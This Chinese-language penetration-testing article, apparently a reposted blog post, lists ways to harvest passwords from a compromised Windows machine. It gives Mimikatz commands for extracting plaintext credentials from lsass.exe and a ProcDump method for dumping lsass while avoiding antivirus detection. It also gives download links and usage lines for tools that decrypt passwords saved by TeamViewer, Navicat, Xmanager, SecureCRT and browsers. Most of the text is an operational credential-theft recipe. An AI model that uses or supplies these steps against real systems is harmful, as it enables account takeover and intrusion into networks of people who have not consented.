文章来源:宸极实验室
在渗透测试中,当我们拿下一台windows
主机后,通常要对主机上的一些密码做信息收集,以便后续渗透使用,本文介绍了几种windows
下常见的收集密码的方式。
windows
密码抓取神器,从windows
系统进程lsass.exe
中抓取明文密码。
https://github.com/gentilkiwi/Mimikatz
Mimikatz.exe
,执行下面的命令:privilege::debug 提取权限
sekurlsa::logonpasswords 抓取密码
如果主机上装了杀毒软件,开了防火墙,例如:360、火绒之类的话。Mimikatz
就会被检测为病毒,无法使用。
由于Mimikatz
是从lsass.exe
中提取明文密码的,当无法在目标机器上运行Mimikatz
时,我们可使用ProcDump
工具将系统的lsass.exe
进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz
进行读取。
ProcDump
本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
•下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/ProcDump
# 将工具拷贝到目标机器上执行如下命令(需要管理员权限)
ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
Mimikatz# sekurlsa::minidump lsass.dmp
Mimikatz# sekurlsa::logonPasswords full
使用该工具获取hash
值之后,可到cmd5.com
进行解密。
https://raw.githubusercontent.com/k8gege/K8tools/master/GetPassword_x64.rar
•下载地址:
https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe
•使用方法:
SharpDecryptPwd.exe -TeamViewer
•下载地址:
https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe
SharpDecryptPwd.exe -NavicatCrypto
•下载地址:
https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe
•使用方法:
先执行 `whoami /user` 将用户名和sid保存下来,然后再使用下面的命令:
SharpDecryptPwd.exe -Xmangager -p SessionPath -s username+sid
•下载地址:
https://github.com/hustlibraco/Moye/blob/master/SecureCRTDecrypt.py
•使用方法:
解密secureCRT保存的密码
1. 找到密码保存位置,每台服务器一个ini文件,windows系统位于
* 用户名\AppData\Roaming\VanDyke\Config\Sessions\ (安装版)
*SecureCRTSecureFX_hh_x86_7.0.0.326\Data\Settings\Config\Sessions (绿色移动版)
2. 执行脚本,python SecureCRTDecrypt.py [filename...]
•下载地址:
https://github.com/ethicalhackeragnidhra/LaZagne/archive/2.3.1.zip
•使用方法:
laZagne.exe browsers
• 下载地址:
https://files1.majorgeeks.com/020c4877362530fccadf006a858f56ee9637177d/covertops/BrowserPasswordDump.zip
• 使用方法:
点击setup安装完成以后,即可提取出单文件来运行使用。
•下载地址:
https://www.nirsoft.net/toolsdownload/netpass-x64.zip
•使用说明:
使用管理员权限运行即可
1、上述描述的抓取密码的方式,大部分需使用管理员权限才能抓取。
2、windows
密码仅在win2008
及以下可使用,win10
及server2012
及以上默认不保存明文密码,无法使用工具抓取。
推荐文章++++